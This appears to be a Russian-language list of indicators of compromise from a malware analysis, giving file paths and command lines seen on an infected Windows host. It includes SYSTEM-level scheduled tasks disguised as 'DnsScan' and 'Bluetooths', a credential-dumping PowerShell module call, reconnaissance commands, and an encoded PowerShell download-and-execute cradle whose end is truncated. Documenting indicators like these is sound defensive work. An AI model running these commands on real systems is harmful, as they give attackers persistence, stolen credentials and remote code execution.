Техническая информация: пути к файлам и командные строки
- <SYSTEM32>\tasks\dnsscan
- <SYSTEM32>\tasks\microsoft\windows\bluetooths
- %WINDIR%\temp\m.ps1
- %WINDIR%\temp\mkatz.ini
- '%WINDIR%\syswow64\cmd.exe' /c net user
- '%WINDIR%\syswow64\net.exe' user
- '%WINDIR%\syswow64\net1.exe' user
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr "%WINDIR%\temp\svchost.exe" /F
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAb...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass "import-module %WINDIR%\temp\m.ps1;Invoke-Cats -pwds"
- '%WINDIR%\syswow64\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr "%WINDIR%\temp\svchost.exe" /F
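- '%WINDIR%\syswow64\schtasks.exe' /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0A...
  (Примечание: значение параметра -e обрезано в источнике («...»). Это Base64 от строки в кодировке UTF-16LE; видимая часть декодируется как «IEX (New-Object Net.WebClient», остальная часть команды на странице отсутствует. Та же команда приведена выше в варианте запуска через cmd.exe /c.)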
- '<SYSTEM32>\whoami.exe' /user
- '%WINDIR%\syswow64\cmd.exe' /c wmic ntdomain get domainname
- '%WINDIR%\syswow64\wbem\wmic.exe' ntdomain get domainname